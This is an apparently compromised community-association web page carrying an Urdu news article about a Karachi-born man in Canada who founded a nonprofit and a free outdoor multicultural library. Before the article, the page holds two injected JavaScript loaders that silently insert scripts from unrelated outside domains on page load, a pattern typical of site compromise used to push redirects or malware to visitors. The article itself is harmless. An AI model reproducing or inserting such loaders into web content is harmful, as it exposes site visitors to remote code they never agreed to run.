;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Love with Humanity Association >> کراچی کے شہری کا کارنامہ، دیارغیرمیں پاکستان کا نام روشن کردیا



کراچی کے شہری کا کارنامہ، دیارغیرمیں پاکستان کا نام روشن کردیا


ٹورنٹو۔ کراچی کے شہری نے دیار غیر میں پاکستان کا نام روشن کردیا۔ پاکستانی سید نجم حسن نے کینیڈا میں لوو وید ہیومینٹی ایسوسی ایشن نامی تنظیم بنائی جس کا مقصد مختلف تہذیبوں کو قریب لانا ہے۔پاکستان کے شہری سید نجم حسن کینیڈا
میں زیر مقیم ہیں جہاں وہ پاکستان کے مثبت امیج کو اجاگر کرنے کیلئے اپنی کوشش کررہے ہیں اسی سلسلے میں انہوں نے ایک ایسوسی ایشن لوو ود ہیومینٹی بنائی جس کا مقصد نئے امیگرینٹس کیلئے معلوماتی سیمینار کا انعقاد کروانا، بے روزگار افراد کیلئے روزگار کے مواقع اور امداد وغیرہ ہے۔

ایسوسی ایشن کے قیام کے بعد سید نجم حسن نے چھ سال کی انتھک محنت کے بعد کتابیں جمع کیں تاکہ لوگوں کو پاکستان کے کلچر اور مثبت پہلو سے روشناس کرایا جاسکے اور ایک ملٹی کلچرل منی لائبریری بنائی۔ اس لائبریری سے ہر کوئی کتابیں لے سکتا ہے اور مستفید ہوسکتا ہے اور اس بات کا اعتراف کئے بغیر کینیڈین وزیراعظم جسٹن ٹروڈیو بھی نہ رہ سکے۔ انہوں نے اپنے سیکرٹریٹ سے جاری کئے گئے لیٹر میں نجم حسن اور ان کی ایسوسی ایشن کی خدمات کا اعتراف کیا جبکہ کینیڈا کے چھ مئیرز کی طرف سے بھی لوو وید ہیومینٹی کو ایوارڈز دیئے گئے۔ اب سید نجم حسن ورلڈ گنیز بک میں بھی اپنی لائبریری کا نام درج کروانے کی خواہش رکھتے ہیں۔سید نجم حسن نےیونیورسٹی آف کراچی سے ہی اپنی بیچلرز اورماسٹرز کی ڈگریاں لیں۔ 2000 سے 2009 تک سعودیہ میں ایک ملٹی نیشنل ادارے میں کام کیا۔ 2009 میں کینیڈا آ گئے۔ ادھر پہنچ کر گلوبل مارکیٹ کے ساتھ یونیورسٹی آف فریڈرکٹن سے ایم بی اے کیا۔ گذشتہ 9 سال سے کینیڈا میں کمیونٹی سروس کے لئے اپنے آپ کو وقف کر رکھا ہے۔ پچھلے سال کچھ دوستوں کے ساتھ مل کر ایک تنظیم بنائی البرٹا میں بے گھروں کے لیئے، بے روزگاروں کے لیئے، سینئرز کے لیئےاپنی ایسوسی ایشن کے پلیٹ فارم سے بہت سارے پروگرام کئے۔


سید نجم حسن نے ”قومی اخبار کو بتایا کہ ہماری یہ تنظیم”لوودہیومنٹی ایسوسی ایشن“ایک نان پرافٹ ایسوسی ایشن ہے جو ایک سال پہلے میں نے اور چند دوستوں نے اپنی رضاکارانہ ِخدمات کینیڈین سوسائٹی کو پیش کرنے کے لیے بنائی ،ہم نے گذشتہ ایک سال میں کمیونٹی کیلئے کافی کام کئے ہیں جن میں نیو امگرینٹس کے لئے مختلف معلوماتی سیمینارز، بے روزگاروں کے لئے سیمینار ، کافی ود سینئرز، بے گھر لوگوں کی مددجبکہ ہمارا سب سے بہترین اور ٹاپ کا پروگرام ” فرسٹ ملٹی کلچرل منی لائبریری“First Multicultural Free Public Out door Libraryانہوں نے بتایا کہ یہ پروگرام میرے ذہن میں آیا یوں سمجھئے کہ یہ میری ایجاد ہے ویسے تو یہاں ہر چھوٹے بڑے شہر میں پبلک لائیبریریز کا ایک بہت جدید اور موثر نظام موجود ہے لیکن مسئلہ یہ ہے کہ لوگوں کو لائبریری تک جانا ہو تا ہے۔ کینیڈا میں نئے آنے والوں کے پاس گاڑی نہیں ہوتی جس سے وہ وہاں لائبریری تک پہنچیںپھر وقت بھی درکار ہوتا ہے اسی طرح جو ہمارے سینئرز ہیں ان کے لئے بھی لائبریری تک جانے کے مسائل ہیں۔ ہمارا آئیڈیا یہ ہے کہ لائبریری اور کتابوں کو لوگوں کے دروازے یا گلی ،محلے تک لایا جائے اس طرح نہ صرف لوگ کتابوں سے استفادہ کریں بلکہ ان کا آپس میں بھی رابطہ ہو جان پہچان ہوجس سے صحتمند معاشرہ تشکیل پائے۔ اس پروگرام کو میونسپل حکومت اور صوبائی حکومت نے بھی بہت سراہا ہے۔

This entry was posted in Uncategorized. Bookmark the permalink. Post a comment or leave a trackback: Trackback URL.

Post a Comment

Your email is never published nor shared. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*
*

X